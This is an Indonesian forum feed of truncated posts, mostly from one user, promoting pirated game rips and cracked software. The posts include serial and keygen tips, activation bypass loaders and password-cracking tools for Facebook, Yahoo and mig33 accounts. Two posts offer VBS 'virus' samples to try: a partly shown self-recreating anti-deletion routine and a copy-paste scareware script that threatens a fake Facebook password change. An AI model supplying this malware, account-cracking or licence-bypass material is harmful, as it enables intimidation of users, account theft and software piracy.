Quote: Software ini berguna banget bagi yang sering ngetik-ngetik artikel atau makalah atau tugas dan sebagainya lah ^-^, jadi kalau kita mau kekamar mandi atau pergi dari depan monitor tinggal cabut flashdisknya dan layar monitor akan menjadi gelap, keyboard dan mouse tidak berfungsi, hanya port USB sajalah yang berfungsi. Intinya: * Brada masukan USB Drive * Brada jalankan Predator (autostart dengan Windows kalau bisa) * Brada lakukan pekerjeaan Brada seperti biasa di depan ... more »

Download Kumpulan Game PC FULL RIP : Fate Of Dragon With Cheat | 73 Mb

Bunga Najwa at Your first forum - 4 minggu yang lalu
Quote: | Highly Compressed |{45Mb Only} It’s too trendy to point out how ubiquitous our 21st Century Orientalism has become -- almost as ubiquitous as the real-time strategy genre. Still, the fact remains that the Far East is a fascinating place and a staple motif of electronic gaming Three Kingdoms: Fate of the Dragon isn’t the first game to utilize the warlord period following the fall of the Han dynasty as a backdrop for adventure and intrigue. Most notable would be the titles from Koei, ... more »

Download Kumpulan Game FULL RIP : Caesar 3 Full With Cheat | 70 Mb

Bunga Najwa at Your first forum - 4 minggu yang lalu
Quote: Game caesar 3 kita harus dapat mengatur strategi agar dapat membangun sebuah kota dengan modal yang telah disediakan. Walaupun game pc ini termasuk game yang cukup lama, tapi lumayan juga buat mengisi waktu luang. Lebih lanjut pada game caesar 3 ini, anda harus membuat sebuah kota berikut fasilitas yang dapat diakses oleh semua orang, seperti Farms harus memiliki akses yang mudah ke Perumahan (untuk buruh), Lumbung, Pasar atau Gudang. Pasokan penting di kota ini adalah pasokan air, ... more »

Download Kumpulan Game FULL RIP :Evil Dead Regeneration [Mediafire] | 126 MB

Bunga Najwa at Your first forum - 4 minggu yang lalu
Quote: Evil Dead Regeneration RIPPED Highly Compressed | PC Game | Genre : Action / Survival Horror | Size : 126 MB Berkisah Ash dalam Evil Dead 2 melanjutkan petualanganya bersama Sam. Makhlukh Deadites/manusia bekas experimen Dr.Reinhard. tetapi Sam masih bisa berpikir seperti manusia dan memiliki bakat mengetahui roh jahat dan portal. Screenshots : System Requiremetns : Windows 98/ME/2000/XP Minimum : * Pentium III 800MHz Processor * 256MB RAM * ... more »

Download Kumpulan Game Pc FULL RIP : Tom And Jerry Fist of Furry With Cheat | 9 Mb

Bunga Najwa at Your first forum - 4 minggu yang lalu
Quote: Dalam game ini Pemain mengambil peran karakter kartun slapstick akrab di Tom dan Jerry di Fists of Furry. Gameplay game berikut pertempuran tradisional kecuali bukan ninja mistis atau prajurit jalanan juara, pemain memilih untuk mengambil peran Tom, Jerry, Spike, Bebek, atau salah satu dari beberapa karakter lain yang diberikan 3D dari kartun Tom dan Jerry. Selain tinju yang disebutkan dalam judul, pejuang juga dapat menggunakan barang-barang rumah tangga akrab seperti penggorengan, ... more »

AVG Internet Security 2012 12.0.1796 Full with Serial Number Valid 2018

timhacker318 at Your first forum - 4 minggu yang lalu
Quote: AVG Internet Security 2012 adalah solusi handal dan mudah yang digunakan untuk pengguna rumahan dan kantor kecil yang dipercaya oleh jutaan pengguna di seluruh dunia. AVG Internet Security melindungi komputer Brada dari serangan virus, spyware, trojan, hacker, spam dan situs berbahaya yang dapat mengancam komputer Brada. Fitur terbaru: * AntiRootkit: Improved detection of new variants of Alureon rootkit. * AntiSpam: Added IPv6 support in AntiSpam update. * Core: More flexible ... more »

Download 2011 Internet Download Manager v6.07 build 9 + KeyMaker Life Time + IDM Optimizer | 5 Mb

timhacker318 at Your first forum - 4 minggu yang lalu
Quote: New : Internet Download Manager v6.07 build 9. Fixed compatibility problems with different browsers including Internet Explorer 9 Final, Mozilla Firefox 4 and Mozilla Firefox 5, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" - Lalu ... more »

Download 2011 Simpo PDF Converter Ultimate 1.5.0 With Serial | 4 Mb

timhacker318 at Your first forum - 4 minggu yang lalu
Quote: Simpo PDF Converter Ultimate 1.5.0.0 adalah software yang dapat membantu brada untuk Mengonvert PDF menjadi format lain. Simpo PDF Converter Ultimate 1.5.0.0 ini bisa mengubah PDF menjadi Word, Excel, PowerPoint, HTML, Text, dan Image. Tampilan yang simple dan ukurannya yang kecil membuat software ini mudah digunakan. Silahkan Brada Download : Download 2011 Simpo PDF Converter Ultimate 1.5.0 With Serial | 4 Mb

10 Aplikasi Bobol Password dari office sampai Hack mig33, fb dll. Bag. 2

timhacker318 at Your first forum - 1 bulan yang lalu
Baik Melanjutkan Artikel buat download xixii!! fary akan tambahkan beberapa software buat bpbpL akun xiixi!!semoga dipakai untuk menolong orang yang kesusahan bukan untuk jailin orang Mkch brada xixixi!! 1.yahoo password+Key | 2,672 KB 2. Mig33 Password Cracker [Sweeping Version] Vx.2 | 2 Mb 3. Solid_Converter PDF PDF Password_Remover | 19 Mb 4.WIFI password finder | 3 Mb 5. Halo pepakura files and program with password | 6 Mb 6. Facebook Password Hacker ... more »

Download Windows 7 Loader v1.9 (aktivasi windows 7)|5.2 MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote:Windows 7 Loader v1.9 Software ini berguna untuk aktivasi windows 7 karna kalau pakek serial tidak bisa aktif jadi harus di patch pakek software ini DOWNLOAD Windows 7 Loader v1.9 This is the loader application thats used by millions of people worldwide, well known for passing Microsoft's WAT (Windows Activation Technologies) and is arguably the safest Windows activation exploit ever created. The application itself injects a SLIC (Software Licensing Description Table) into ... more »

Download Kumpulan Game PC FULL : Zombie Shooter V1.2 With Cheat | 48 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Sebelumnya fary telah Shar game yang versi 2 nah karena ada permintaan dari brada fary akan share yang versi pertamanya. Di mana batas antara kehidupan dan kematian? Sejauh mana manusia mendapat ilmu, mencoba untuk memahami ini? Mengambil bagian dalam peperangan besar untuk menyelamatkan manusia dan mengetahui apa yang terjadi! Ras manusia dalam bahaya!!. Saat ini para ilmuwan tidak dapat menanggulangi ancaman yang dekat dan semua orang menjadi Zombie!!!. Penyakit menular ... more »

Portable Kelk 2000 + Full Install toutorial Kalighrafi islami|17Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote:Portable Kelk 2000 + Full Install 17 MB Font kaligrafi empat, Naskh, Nastaliq, Thuluth dan Shikasta dalam bentuk mereka saat ini, memiliki sejarah lebih dari 700 tahun. Selama berabad-abad lalu, para empu kaligrafi telah sempurna font ini, dan telah menciptakan karya seni yang menyenangkan untuk mata. Aturan ligatures kombinasi dalam kaligrafi begitu rumit sehingga membutuhkan bertahun-tahun pelatihan dan praktek bagi seseorang untuk menjadi seorang guru di salah satu font kaligrafi ...more »

Download Kumpulan Game PC FULL RIP : Diablo II | 513 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: After the vile demon Diablo was apparently destroyed in Diablo, be prepared for the fight of your life as the hellspawn is back in Diablo II. The warrior who defeated Diablo, thinking he could contain the demon, thrust the crystal into his own skull. Yet the overwhelming fury of the arch-demon, combined with the warrior's fatigue, was more than enough to overpower the helpless man. Diablo immediately twisted the once proud warrior's body into a walking nightmare--you must now stop this ... more »

Download Kumpulan Game PC FULL RIP : WWE RAW Ultimate Impact 2.0 | 336 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Download Games Smackdown yang rilis pertama kali setelah 6 tahun vakum yang bernama "WWE RAW Ultimate Impact 2009" yang merupakan permianan gulat gaya bebas. Permainan ini memiliki grafis yang lebih baik dari versi sebelumnya dan kontrol penggunanya juga telah diperbaurui dan tidak merepotkan pengguna, banyak wajah pegulat-pegulat baru yang dimunculkan sesuai dengan tahun 2009 dan bintang nya masih dipegang John Cena, Randy Orton, The Undertaker. Shawn Michael, Rey Mysterio, dll, di ... more »

Download 2011 Software UHARC GUI v.4.0.0.2 Untuk Membuat Rip Game | 1 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: UHARC GUI v.4.0.0.2 , merupakan salah satu alat bagi brada untuk membuat game RIP (Mengecilkan Ukuran File Game). Mungkin Untuk kali ini fary akan sedikit menjelaskan kegunaan software yang mirip WinRar ini. Cara Singkat membuat Game Rip : 1. Pergilah ke folder Installation Game Brada dan cari file yang hanya akan membuat Game Brada tsb akan menjadi lebih besar dalam hal ukurannya. Dalam gambar ini, saya menghapus beberapa file audio (Beberapa file kapasitasnya di atas 100 Mb) ... more »

Download 2011 Mempercepat Koneksi Modem HP dengan FPGWare Throttle Full Key | 1.5 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: PGWare Throttle adalah software untuk semua yang memungkinkan Brada untuk mengubah pengaturan modem Brada untuk meningkatkan performa internet sampai 200% atau lebih tinggi! Tidak ada modifikasi untuk hardware Brada dan semua dilakukan penyesuaian dan pengaturan ini dilakukan dengan mudah menggunakan antarmuka yang anak kecil pun bisa digunakan. Sebagian besar 'lainnya' enhancer modem janji bahwa mereka bekerja saat Brada melihat ada perbedaan sama sekali dalam hal kecepatan internet. ... more »

Download 2011 ExtremeCopy V.2.0.5 Full With Serial | 3.7 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: ExtremeCopy 2.0.5 Pro merupakan aplikasi yang sama dengan cara kerjanya dengan aplikasi yang bernama TeraCopy dan DurableCopy , yang pernah Fary share. Namun berdasarkan hasil uji coba test kecepantan antara ketiga aplikasi tersebut ExtremeCopy 2.0.5 Pro lah yang unggul dalam bidang kecepatan dalam pensalinan/copy suatu file. ExtremeCopy 2.0.5 Pro , sangat berguna sekali bagi brada yang tidak mau lama menunggu mengcopy file dan juga Software ExtremeCopy 2.0.5 Pro ini ukuranya hanya ... more »

Download Kumpulan Game PC FULL RIP WORK : Carnivores | 52 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Carnivores is a first person shooting video game produced by Action Forms and released by WizardWorks Software in 1998. It is the first of Carnivores series. The player takes the role of a DinoCorp's member. At start of a new game, the player must register a new hunter or continue with a saved hunter. The point of the game is hunting dinosaurs to get trophies and accumulate score. Each dinosaur represents a set number of points. A novice hunter starts with zero points, when his ... more »

Cara Mencari Serial Number Software anda

Vierra at Your first forum - 1 bulan yang lalu
Cara Mendapat Nomor Serial Program Anda 1. Bukalah browser yg anda suka (ane make mozilla) 2. Masuk ke google.com 3. Ketikkan di google type : "nama program" 94FBR 4. Tekan enter dan selamat.... serial yg anda cari akan berhasil di temukan Sebagai contoh " "photosop Cs5" 94FB 94FB tuh apaan ? kalo lu ngetik 94FBR di google, entah gimana caranya google langsung tau kalo ente pingin cari crack buat softwarenya itu Syukron

Download Kumpulan Game PC FULL RIP WORK : Black & White | 158 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Pemain yang baik mencoba untuk menang atas desa-desa melalui bantuan konstan. Taktik umum adalah untuk menyumbangkan makanan dan kayu, membangun gedung, melindungi desa dari dewa lainnya, mengirim misionaris, dan menggunakan Creature untuk menghibur penduduk desa. Namun, penduduk desa menjadi bosan dengan upaya yang sama untuk mengesankan mereka yang berulang. Dengan kata lain jika batu-batu terbang overhead menjadi terlalu sering, mereka akan kehilangan pengaruh mereka. Hal ini akan ... more »

Download Kumpulan Game PC FULL RIP WORK : Conflict Desert Storm 2 : Back To Baghdad | 115 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Conflict Desert Storm II : Back To Baghdad adalah penerus baik waktunya dengan taktis asli skuad berbasis aksi permainan dari musim gugur lalu. Permainan ini awalnya dipanggil Konflik Desert Sabre, tetapi invasi kehidupan nyata dari Irak beberapa bulan lalu memberikan kesempatan emas untuk bekerja kata Baghdad menjadi judul dan memanfaatkan ketertarikan dunia dengan Operasi: Kebebasan Irak. Namun game ini berlangsung selama Perang Teluk 1991 dan sekali lagi memiliki pemain yang beroperasi ... more »

Download Kumpulan Game PC FULL RIP WORK : Soldier Elite | 428 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Episode ketiga dalam petualangan Kapten Cole Sullivan, bintang Gorky Nol: Beyond Kehormatan dan Gorky 17. Dua agen hitam menemukan Sullivan pada lantai. Pahlawan yang pernah menyelamatkan dunia telah minum selama lebih dari dua tahun. Apakah dia berhasil mendekati Parecki sekali lagi? Rahasia manuver, kargo luar biasa dan bencana kapal selam di Laut Barent itu - itu hanya puncak gunung es. Seperti pendahulunya, Menonton Aurora tindakan siluman permainan dalam gaya Metal Gear Solid, ... more »

Download Kumpulan Game PC FULL RIP WORK : Stronghold 2 With Cheat | 290 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: While there have been plenty of additions made to Stronghold 2 over its predecessor, a poor story, weak artificial intelligence, and plenty of bugs mar what otherwise could have been a simple yet fun castle-building game. Screenshots : Minimum System Requirements: * OS: Windows 98/ME/2000/XP * Processor: 1.4 GHz * Memory: 256 Mb * Hard Drive: 2.5 Gb free * Video Memory: 32 Mb * Sound Card: DirectX Compatible * DirectX: 9.0c * Keyboard, ... more »

Download Kumpulan Game PC FULL RIP WORK : Jurassic Park : Operation Genesis With Cheat | 80 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Jurassic Park: Operation Genesis adalah game ber-genre construction and management simulation. Tujuan utama pemain adalah sederhana: membuat taman / kebun binatang dinosaurus menampilkan, membuatnya populer, dan membuatnya aman. Fungsi permainan yang sangat mirip dengan SimCity dan model permainan Tycoon. Hal ini diperlukan untuk membangun stasiun makan di mana herbivora bisa mendapatkan bal pakan tanaman, sedangkan karnivora diberi makan sapi hidup atau kambing. Namun, herbivora menjadi ... more »

Download 2011 ESET NOD32 Key Finder 2011 | 6 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Jika Brada Pengguna Anti Virus NOD32 biasanya brada akan rajin untuk Update baik itu Data Base Virus ataupun Lisensinya, nah dengan menggunakan Software yang satu ini brada akan diberi kemudahan untuk Update Data Base maupun Lisensi untuk anti virus NOD32. AIO Contains: - Portable TNODUP V1.4 Final - Portable NodLogin V10.0.1 - Portable MiNODLogin V3.9.0.1 - Eset Login Viewer V1.4 1. TNODUP V1.4 Final This is a program at the request of the user dives into the Internet ... more »

Download Kumpulan Game PC FULL Portable : Scooter War3z | 143 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: It's mayhem with scooters! Scooter War3z delivers a surprising combination of high-speed racing, crash-'em-up action, and death-defying ragdoll stunts. Discover the dark-but-alive world of Scooter War3z, taking place in a free-roaming city featuring several interconnected neighborhoods. Screenshot : System Requirement OS: Windows 2000/XP Processor: Pentium 3 800 MHz Memory: 256 MB RAM VGA: 3D Video Card 64MB Directx 9.0b Password If Need : timhacker318 Silahkan Brada ... more »

Download Kumpulan Game PC FULL RIP WORK : Dynasty Warriors 4 Hyper | 750 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Description For the first time ever, the highly-acclaimed Dynasty Warriors series is coming to a whole new battlefield – the PC. With a host of graphical and gameplay enhancements, Dynasty Warriors 4 Hyper is the definitive version of this best-selling tactical action game. The 400-year reign of the Han Empire has been brought to an end. The once noble Chinese empire has crumbled into three warring states, all vying for control of a land ruled by chaos. In the fires of battle, ... more »

Download Kumpulan Game PC FULL RIP WORK : iBomber Defense v1.0 | 89 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: iBomber Defense combines classic tower defense gameplay with intense action and strategy. Keep enemies at bay all over the world using a variety of weapons and tactics, from rattling Machine guns, explosive cannons and awesome anti-aircraft artillery! Choose from Quick play and Campaign modes and battle across North Africa, Europe and Russia as both the Allied and Axis forces. Position your defenses and prepare for attack. iBomber Defense is the complete entertainment package with ...more »

Beberapa Contoh Sample Pembuatan Virus Dengan DR. VBS

timhacker318 at Your first forum - 1 bulan yang lalu
Melanjutkan artikel yang dulu: Code:http://teamhacker.4ulike.com/your-first-forum-f1/cara-buat-virusdownload-software-dr_vbs_virus_maker-t175.htm?highlight=cara+buat+virus Nah xixixi!! ini ada beberapa contoh sample viruspatut di coba brada xixii!! : 1. Anti Delletion This function must be the last one called, cause it never ends. If it detects that the file has been deleted, it creates it again. Code:Function Antidelete() Set fso = CreateObject("scripting.filesystemobject") Set ... more »

Buat virus Fesbuk yuk brada aaaaaaaawww!

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Mua30x ini scriptnya CTRL+C ajah xixixi Copas kode berikut, simpan dalam ekstensi file .vbs Dim code Dim pass Code:pass = “tiimhacker.co.cc” MsgBox “Hallo Kamu telah terinfeksi Virus Facebook!!. Waktu anda tinggal 3 hari lagi sebelum password Facebook anda diganti. Waktu 3hari anda dimulai: ” & Time, 16, “Facebook Virus” Do code = InputBox(“Masukkan 6 angka penangkal virus Facebook.”, “Virus Facebook Removal”) If code<>pass Then MsgBox “Kode ” & code ... more »

WebCracker v4.0

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: WebCracker v4.0 ENGLISH Webcracker is a security tool that allows you to attempt to test id and password combinations on your web site. If youre able to guess a users password with this program, chances are some hacker will be able to also. Webcracker helps you find these vulnerablilities and fix them before theyre exploited by some unknown attacker. INDONESIA webcracker alat keamanan yang mengizinkan brada berusaha ke orang yang tak punya naluri percobaan dan kombinasi ... more »

Info : RAPBN 2011 Dinilai Tidak Mendukung Pendidikan

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: VIVAnews - Fokus pemerintah dalam memajukan bidang pendidikan khususnya bagi masyarakat miskin dianggap tidak konsisten. Penilaian ini didasarkan dari minimnya anggaran pendidikan bagi siswa miskin dalam RAPBN 2011. Koordinator Asosiasi Perempuan Pengusaha Usaha Kecil (ASPPUK) M. Firdaus, menyatakan total anggaran untuk Kementerian Pendidikan Nasional (Kemendiknas) yaitu sebesar Rp63.577.252.938.000 dan 20 persen di antaranya tidak diiringi dengan grand desain kebijakan anggaran ... more »

INDO BILLING 6.70 + KEY

timhacker318 at Your first forum - 1 bulan yang lalu
Quote:IndoBilling merupakan software untuk mencatat dan menghitung tarif pemakaian komputer dengan sistem prabayar maupun pascabayar yaitu prepaid dan postpaid pada usaha warnet, game online maupun offline, persewaan komputer, kursus komputer, laboratorium komputer sekolah dan lain-lain. Software IndoBilling Selain berfungsi untuk mencatat transaksi pemakaian akses komputer maupun internet juga berfungsi sebagai sistem keamanan komputer, memblokir aplikasi di client yang di inginkan dan juga ... more »

Download Kumpulan Game PC FULL Portable : Deer Drive | 53 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Game Deer Drive Menurut Fary game yang walaupun jadul, tapi imut lutcu tegang bis brada bisa tembak pantat hewan xixixii!!! kalau gak percaya coba saja sebab game ini ringan dimainkan juga portable mudah lagih xixii!!. Xixix!! bisa kentut Iiiiiiiiich Gemezzz.... Deer Drive is an arcade style deer hunting game that lets you experience real hunting. This game allows you to experience pure shooting fun as herds of deer come past you without the need to stalk or track them. It allows ... more »

Download Kumpulan Game PC FULL RIP WORK : Pac-Man World 3 | 145 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Pac-Man is teleported by Orson through 14 different levels to fight Erwin, his army of robots, monsters and Spectral Entities to save the world, Pac-Land and the Spectral Realm. Erwin plans to siphon spectral energy from the Spectral Realm to power his army of robots in order to rule the world. Pac-Man uses punching, Rev Rolls, Butt-Bouncing and various new Power Pellets to defeat Erwin and his minions. Pac-Man also pilots Toc-Man in a battle against Erwin’s robot army. Joined by ... more »

Download Kumpulan Game PC FULL RIP WORK : European Street Racing [IDWS] | 226 MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Di game ini brada akan menjajal sirkuit jalanan disepanjang negara eropa diantaranya jerman, inggris, spanyol maupun italy, dengan efek 3Dnya membuat efek turbolensi menjadi lebih nyata.Di game apalagi ditambah dengan model dan kostumnisasi atau modifikasi yang bervariatif juga dihadirkan pada game balap ini, karatek mobil yang digunakan juga bermacam-macam dan mirip dengan aslinya(otentik). Buat brada yang suka game balapan tidak salah memilih game ini. Silahkan dibaca cara setup ... more »

Download 2011 Portable Full : VSO ConvertXtoDVD v4.1.19.365c | 26 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Convert AVI to DVD Watch your videos on any TV with our avi to dvd converter software. Convert 1 or move videos to DVD. Designed for beginners, but with advanced settings available. AVI to DVD MKV to DVD MOV to DVD WMV to DVD MTS and M2TS to DVD Mpeg to DVD and more (see supported formats) Create ... more »

Download Kumpulan Game PC FULL RIP WORK : Stronghold Crusader Extreme With Cheat | 150 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Stronghold Crusader Extreme merupakan versi update dari Stronghold expansion 2001 oleh Firefly Studios. Stronghold Crusader Extreme memiliki setting permainan pada perang salib. Stronghold Crusader Ekstrim memiliki penambahan pasukan yang lebih besar dari 10.000 pria, bangunan baru dan misi. Brada akan di manjakan dengan peperangan yang sangat dahsyat, brada harus membuat strategi supaya menang dalam peperangan jangan sampai baru main prajurit mati semua akibat di panah xixixi!!. ... more »

Download 2011 Software Pengusir Nyamuk dan Tikus | 1.5 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: xixixi!!brada pingin ngusir Tikus, Kecoa, sampai mbahna kecoa bisa aaaaaaaaawww xiixi!! coba dweh software ringan ini bagus dan Lucu sekaligus aneh iiihh... ^_^ xiixix aya2 wae...suaranya itu bradaaa gak tahan pingin Gimana gitoch..Loch eww... udah ah yuk kita sedot ajah ea moga bermanfaat buat ngusir Tikus, nyamuk, lalat dan apa ajah xixixi!! CPDECH!! nah ini sedikit gambaranya buat brada dan sista juga Bunda Icha :* Mcuuuuuuuaaaaaaaaaaaaaaahh Aplikasi Suara Pengusir Nyamuk ... more »

Download 2011 CardRecovery v5.30 Build 1206 Full With Patch | 1 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: CardRecovery v5.30 Build 1206 , merupakan software yang dapat membantu brada mengembalikan data yang terhapus dari memorie card HP seperti video , photo dalam memorie Hp brada terhapus bisa memakai software ini. Dulu Fary pernah share tentang CardRecovery v3, nah sekarang update yang terbarunya. Support apa saja software ini: CardRecovery ini akan secara Pintar mengembalikan File yang sudah terhapus, software ini juga didukung oleh kebanyakan tipe kartu memori termasuk: SD ...more »

Download 2011 Memperbaiki Safe Mode Eror Dengan SAFE MODE FIXER | 64 Kb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Software Safe Mode fixer, merupakan software yang di rancang untuk membantu brada yang tidak bisa masuk ke safe mode bisa diakibatkan crash , corupt atau kena virus. Cara menggunakan aplikasi ini juga bisa di katakan sangatlah mudah, karena tidak terlalu banyak tombol tersedia di aplikasi Safe Mode Fixer ini, hanya ada "FIX", "About", dan "Exit". Pasti udah tau kan harus klik yang mana?? Oiya, jangan lupa untuk memperlancar kerja aplikasi ini, harap dijalankan dengan mode "run ...more »

Download Kumpulan Game PC FULL RIP : Night Watch Racing | 188 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: As one of the "Other", race your way to tipping the balance between the forces of Light and Darkness. Choose your side wisely as every vehicle possesses a unique magic power that may be the way to victory or ruin. Anything goes in your rush to the finish line as more than just personal victory or loss depends on your performance. Screenshoots : System requirements: * Windows 2000/XP * Pentium IV 1.8 GHz or above * 256 MB RAM * 3D graphics adapter ... more »

Download Kumpulan Game PC FULL RIP : Donkey Xote | 147MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Donkey Xote is based in the Filmax animation film of the same name. Discover the true story of Don Quixote seen through the eyes of Rucio, Sancho's donkey. In this new approach, you face the challenge of meeting Dulcinea. But first you must participate in an adventure that will take you from the calmness of Sancho's house to the jousting tournament in Barcelona. Screenshoots : System Requirements : * OS:XP/VISTA/2000 * Processor: Pentium 3 @ 1 GHz ... more »

Download Kumpulan Game PC FULL RIP : AntiKiller | 129 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: the Anti killer motion picture, the Antikiller game continues a brutal war between obnoxious crime gangs and a one man vigilante, a former police officer known as the Fox. Your choice is to join the brutal gangs as one of their leaders and fight your way to domination through rivers of blood, have your revenge as the Fox, or enter madman as Barkas, the notoriously dangerous no one's man. Screenshoots : System requirements * Processor : PIII 1,2Ghz CPU ... more »

Download Kumpulan Game PC FULL RIP : Micro Machines V4 [Mediafire] | 120 MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: The micro racing series returns with this fourth edition of the multiplayer mini-racer. Mixing miniature mayhem with maximum multiplayer racing, Micro Machines v4 arrives packed with knockabout,breakneck racing in the fastest scale miniatures, complete with explosive weapon power-ups. Letting you loose with hundreds of vehicles, each with distinctive performance abilities, you’ll be racing your inch-long miniature motors on wild tracks where everyday household objects appear immense ... more »

Download Kumpulan Game PC FULL RIP : TUROK | 158 MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: The game follows Tal'Set, a Saquin Indian who is transported to the Lost Lands; a strange, dark world where "Time has no meaning". while fighting Captain Tobias Bruckner (a tyrannical and genocidal maniac who sees Native Americans as worthless animals; apparently based upon George Custer; though bloosthirsty to the point of psychosis) of the United States Army; apparently this occurs in the late 19th century, around the time of the Indian Wars. He is rescued by the seer Tarkeene that ...more »

Download Kumpulan Game FULL Repack : Army Men RTS [Mediafire] | 183MB

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Army Men: RTS is a game in the Army Men video game series. It is a real time strategy game. The game includes 15 campaign missions, 8 "special operation" missions and 8 "great battles" missions. The game revolves around collecting resources (Plastic & Electricity) and using it to build structures and troops while fighting the tan army. Each structure/soldier requires a certain amount of resources. The game is heavily based on the movie "Apocalypse Now", as the player has to hunt down ... more »

Download Kumpulan Game FULL RIP : Game Limbo | 70 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: Limbo adalah game dengan Genre puzzle-platform/Arcade sidescroller 2D yang menggabungkan sistem fisika yang mengatur objek lingkungan dan karakter pemain. Pemain dengan berfokus pada karakter seorang bocah yang tidak disebutkan namanya dan terjebak dalam lingkungan berbahaya dan menyeramkan untuk mencari adiknya. Pengembang membangun teka-teki permainan mengharapkan pemain gagal sebelum menemukan solusi yang tepat. Playdead disebut gaya bermain "percobaan dan kematian", dan digunakan ... more »

Download Portable Full Next Limit RealFlow 2012 v6.0.0.0055 | 127 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: RealFlow, with sister product the RealFlow RenderKit, is a unique fluids and body dynamics software package which allows you to simulate anything from a single drop of water to a massive tsunami crashing across a beach, sweeping debris in its wake. RealFlow remains the definitive tool for the creation of flawlessly realistic simulations, and has been used to produce some of the most ground-breaking visual effects ever seen, in movies like -Avatar-, -District 9-, -2012-, -GI Joe-, and ... more »

Download 2011 Portable Full PearlMountain Photo Frame Master v1.3.0 | 19 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: PearlMountain Photo Frame Master v1.3.0 , merupakan suatu aplikasi edit photo yang terbilang ringan dan mudah di gunakan brada akan bisa memilih kecerahan photo dan juga brada dapat memilih frame yang lumayan banyak. apa lagi kalau brada tambahkan di photo profil facebook. Dijamin bagus xixii!! Silahkan Brada Download. Download pilih di MULTIUPLOAD biar bisa di resume. Download 2011 Portable Full PearlMountain Photo Frame Master v1.3.0 | 19 Mb

Download 2011 Internet Download Manager v6.07 build 8 + KeyMaker Life Time + IDM Optimizer | 5 Mb

timhacker318 at Your first forum - 1 bulan yang lalu
Quote: New : Internet Download Manager v6.07 build 8. Fixed compatibility problems with different browsers including Internet Explorer 9 Final, Mozilla Firefox 4 and Mozilla Firefox 5, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" - Lalu ... more »

Tips 2011 Cara Membuat Chat Facebook Menjadi Tampilan lama (Menghilangkan Chat Sidebar Facebook)

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Jika Brada yang terganggu dengan Chat Facebook yang baru pingin banget dan rindu karena kenyamanan dengan chat facebook yang dulu,silahkan langsung aktipkan FB Chat Sidebar Disabler 1.7, yang pungsinya untuk mendesablekan chat baru facebook dan di ganti dengan chat facebook yang lama. Semoga tips ini bermanfaat, silahkan brada aktifkan FB Chat Sidebar Disabler 1.7: Silahkan pilih sesuai browser yang brada pakai : 1. FB Chat Sidebar Disabler 1.7 Untuk MOZILLA FIREFOX 2. FB ... more »

Windows Se7en XP Black Edition 2010

timhacker318 at Your first forum - 2 bulan yang lalu
Windows Se7en XP Black Edition 2010 All driverpacks are included: DriverPack Graphics A 8.12.1 DriverPack Graphics B 8.12.1 DriverPack Graphics C 8.12.1 DriverPack LAN 8.12.1 DriverPack CPU 8.04 CCleaner 2.21.940 dfxWMP (for more voice in WMP11) DirectX 9.0c Flash Player 10 IE/FF IconPackager 3.2 Internet Explorer 8 Java(TM) 6 Update 15 Messenger Plus for WLM 9 Mozilla Firefox 3.5.0 NetFramework 2.0 Silverlight 2.0 Winrar 3.80 Ueber icon 1.0.4 Windows Media Player ... more »

Download 2011 Internet Download Manager v6.07 build 7 + KeyMaker Life Time + IDM Optimizer | 5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: New : Internet Download Manager v6.07 build 7. Fixed compatibility problems with different browsers including Internet Explorer 9 Final, Mozilla Firefox 4 and Mozilla Firefox 5, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" - Lalu ... more »

Download Kumpulan Game PC FULL RIP WORK : The Chosen: Well of Souls | 223 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
